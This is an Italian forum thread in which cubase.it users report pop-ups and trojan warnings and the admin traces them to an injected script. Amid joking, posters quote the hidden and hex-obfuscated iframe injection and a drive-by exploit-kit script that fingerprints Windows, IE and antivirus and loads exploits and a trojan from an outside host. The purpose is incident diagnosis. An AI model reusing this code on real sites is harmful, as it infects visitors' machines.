quote:
Originally posted by gio:
me neppure
ma sei kenny di southpark?
No
In realtà sono Omer Simpson
Ma come fa a sapere che sono su un forum di cubase?!
Ora che ci penso...anche quando ero in un sito porno mi è spuntato per chiedermi se volevo un sito di lesbiche!!!
ammettilo; sei kenny di southpark, who killed you?
gennaro
quote:
Originally posted by PAPE:
beh, uno spyware molto interessante visto che ti indirizza a pagine correlate e di altissimo interesse (soprattutto nel secondo caso )... una sorta di motore di ricerca automatico...
cmq molto strano.
Hai mai provato a clickare sul banner e vedere dove ti indirizza?
Si, ovviamente per sbaglio ho cliccato ma si impalla explorer e si chiude ma non c'impalla il pc però. Si chiude la paggina e basta!
...oh no!!!
hanno ammazzato Kenny!
quote:
Ma anche a voi capita che si apre un pop up mentre navigate su questo forum e vi dice se volete aquistare cubase e porta la scritta di un sito tipo wolrdmdiamall o qualcosa del genere?
da un paio di giorni a questa parte, appena entro su cubase.it, parte l'antivirus e mi segnala un troian horse dialer.
quote:
io non ho l'antivirus.
però mi appare una iconcina in basso con la scritta http//ad0299.vogservice....
un popup, insomma.
l'unica rottura di faraglioni sta nel fatto che devo chiuderla (pulsante destro + chiudi)
quel popup ti salva un exe nei files temporanei... non chiedermi come e' possibile, misteri di internet explorer
quote:
Originally posted by PeterPa:
io non ho l'antivirus.
,e come ti viene??!
su computer diversi accedendo a cubase.it mi si apre l'antivirus e solo su questo sito.
Almeno cerchiamo di escludere alcune ipotesi
Certo, se NON si utilizzasse IE sarebbe ancora meglio, però esiste il libero arbitrio
Insomma facevo meglio, prima, a star zitto
Cj, urge un controllo
function Run_BOF()
{
self.focus();
for (i=1 ; i <=4 ; i++)
{
document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');
}
document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');
}
var Trojan_Path="http://ad0299.vogservice.com/cgi-bin/ie0601.cgi?exploit=";
if (navigator.appName=="Microsoft Internet Explorer")
{
var InetPath=document.location.href;
j=InetPath.lastIndexOf('/');
InetPath=InetPath.slice(0,j);
var ExploitNumber=1;
var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
if (IEplatform.search("Win32") != -1)
{
var WinOS=Get_Win_Version(IEversion);
PatchList = clientInformation.appMinorVersion;
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");
var IE_vers = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
try
{
var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization
fNortonAV=1;
}
catch(e){}
try
{
var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization
fMcAfee=1;
}
catch(e){}
switch (WinOS)
{
case "2K":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=2; }
}
break;
case "2K3":
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
break;
case "XP":
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
{
for (var i=0; i < PatchList.length; i++)
{
if (PatchList[i]=="SP2")
{ XP_SP2_patched=1; }
}
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=5; }
else
{ ExploitNumber=4; }
}
break;
default:
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else
{ ExploitNumber=2; } // if JVM = 5.0.3810.0 or higher
break;
}
// launching exploit which number is depends on Windows and IE versions
switch (ExploitNumber)
{
case 1:
Trojan_Path=Trojan_Path+"MS03-11";
ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="SandBoxEscape.class" width=1 height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';
break;
case 2:
tagstyle='style="display:none"';
ObjectContainer.innerHTML='<object data="'+InetPath+'/cgi-bin/ie0601.cgi?gethta" '+tagstyle+'></object>';
break;
case 3:
window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1,menubar=0,titlebar=0,toolbar=0,status=0");
self.focus();
break;
case 4:
Run_BOF();
break;
case 5:
PageContainer.location="ie0601e.wmf";
break;
default:
break;
}
}
}
Insomma, una volta di più, forza Firefox e os x
Ci sono diversi dati al riguardo
quote:
Originally posted by Arturio:
il troian me lo lancia anke quando apro cubase .it con firefox....
Mai usato ne antivirus ne apyware ne firewall
W osx w il mac w la libertà
Gennaro
come disse fry: nel ventesimo secolo a new york non guidava nessuno.. c'era troppo traffico!
gennaro
quote:
Originally posted by pierecall:
Ho visto che su alcuni pc esce la seguente stringa
No Mac no Party con la faccia di Clooney che sorridegennaro
io preferisco la faccia della Paltrow che dice no Hp no party...e io che le rispondo...nel mio letto ce ne sono due e ti mettiamo in mezzo...
mele del ca77o!!!!
ciao melinda (gennariello).... fai il bravo e comprati un pc
ciao vak
quote:
Originally posted by MichyLee:
Il problema risiede, sempre che non dica eresie, nella home e precisamente in tale script, presente nel codice sorgente:
<script language=javascript>document.write(unescape('<iframe src=http://ad0299.vogservice.com/ie0509.htm WIDTH=1 BORDER=1 HEIGHT=1 style=display:none></IFRAME>'))</script>confermo è in questa riga :
<script language=javascript>document.write(unescape('<iframe src=http://ad0299.vogservice.com/ie0509.htm WIDTH=1 BORDER=1 HEIGHT=1 style=display:none></IFRAME>'))</script>
e quì c'è qualcosa che può interessare cj (mi sa che ti hanno hackerato il sito)
http://www.mkportal.it/support/archive/index.php/t-11019.html
Cj, urge un controllo
Ma ho letto ( http://forum.html.it/forum/showthread.php?threadid=987058 ) che potrebbe ritornare ed il tutto dovrebbe essere causato dal forum in php che fa parte del pacchetto di php-nuke ma che al momento è attivo solo per test amministrativi.
non appena riapparisse qualcosa del genere potete segnalarmelo via email o qui, plis?
a me quella riga non appare più nel codice, fatemi sapere
bye
cj
A me qui è apparso solo una volta e ho scritto subito il topic perchè mi sembrava strano che fosse un pop up che ti chiedeva di comprare cubase e che fosse simile a quelli spuntatomi negli altri siti.....
quote:
Originally posted by Kenny:
Quindi scusate l'ignoranza...non è qualcosa che è nei nostri pc ma nel sito? O meglio NEI siti?A me qui è apparso solo una volta e ho scritto subito il topic perchè mi sembrava strano che fosse un pop up che ti chiedeva di comprare cubase e che fosse simile a quelli spuntatomi negli altri siti.....
è un cavallo di troia che attacca i buchi dei piccì con windows sfruttando una falla del sistema di pubblicazione delle pagine web. In pratica quest'ultima falla permette di scrivere la riga di codice citata e di conseguenza chi usa uno dei vari win (98, 2000, xp, etc.) si ritrova quel popup non proprio benevolo ed infatti segnalato come virus da chi ha un antivirus.
colpe a metà, quindi.
bye
cj
quote:
Originally posted by cj:
è un cavallo di troia che attacca i buchi dei piccì con windows sfruttando una falla del sistema di pubblicazione delle pagine web. In pratica quest'ultima falla permette di scrivere la riga di codice citata e di conseguenza chi usa uno dei vari win (98, 2000, xp, etc.) si ritrova quel popup non proprio benevolo ed infatti segnalato come virus da chi ha un antivirus.colpe a metà, quindi.
bye
cj
in un altro topic si parla di CAZZA, qui si parla di FALLA...
non so più cosa pensare...
ciao vak
quote:
Originally posted by PeterPa:
io non ho l'antivirus.
quote:
Originally posted by PeterPa:
michy, quello che dici è normale.
anch'io quando ho smesso di usare il mac mi son dimenticato subito tutti i trucchi che dovevo usare per sopperire alla mancata potenza del processore(patch ottimizzate e stringate al massimo).
Ora, tornando indietro, non saprei come fare.
Si chiama "ignoranza di ritorno"; non sai più fare le cose per mancanza di pratica.
Non preoccuparti di dire le cose, ti capiamo, ti capiamo ...
Il punto è proprio questo con mac non occorre alcun trucco o diavoleria fa quello per cui è preposto senza tanti problemi che con il tuo bel cassone dei morti stai ancora pensando di arrivare a fare, un giorno forse !!!
gennaro
code:<script language=javascript>document.write(unescape('\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70
\x3A\x2F\x2F\x61\x64\x30\x32\x39\x39\x2E\x76\x6F\x67\x73\x65\x72 \x76\x69\x63\x65\x2E\x63\
x6F\x6D\x2F\x69\x65\x30\x35\x30\x39\x2E\x68\x74\x6D\x22\x20\x57\x49\x44\x54\x48\x3D\x31\x20\x42\x4F\x52\x44\x45\x52\x3D\x31\
x20\x48\x45\x49\x47\x48\x54\x3D \x31\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x22
\x3E\x3C\x2F\x49\x46\x52\x41\x4D\x45\x3E'))</script>
che palle!
quote:
Originally posted by pierecall:
Il punto è proprio questo con mac non occorre alcun trucco o diavoleria fa quello per cui è preposto senza tanti problemi che con il tuo bel cassone dei morti stai ancora pensando di arrivare a fare, un giorno forse !!!gennaro
gennà, i trucchi ho smesso di farli con il cassone.
li facevo quando avevo la mela; ero costretto a farli, perchè la poverina era tisica ....
quote:
Originally posted by PeterPa:
gennà, i trucchi ho smesso di farli con il cassone.
li facevo quando avevo la mela; ero costretto a farli, perchè la poverina era tisica ....
Buah aspetta apro la finestra e faccio uscire questa mega palla che hai scritto
Ciao Paolone
gennaro
...che ho nuovamente risolto. Sta cosa pesca un file a caso e ci scrive uno script
Segnalate, please, nuovamente qui nuovi problemi, grazie 1000.
bye
cj
h t t p://ad0299.vogservice.com/ie0509.htm
(scritto male per non farci cliccare sopra)
gli utenti Win dovrebbero almeno bloccare questo sito via antivirus o via opzioni del browser
bye
cj
Gennaro
bye
cj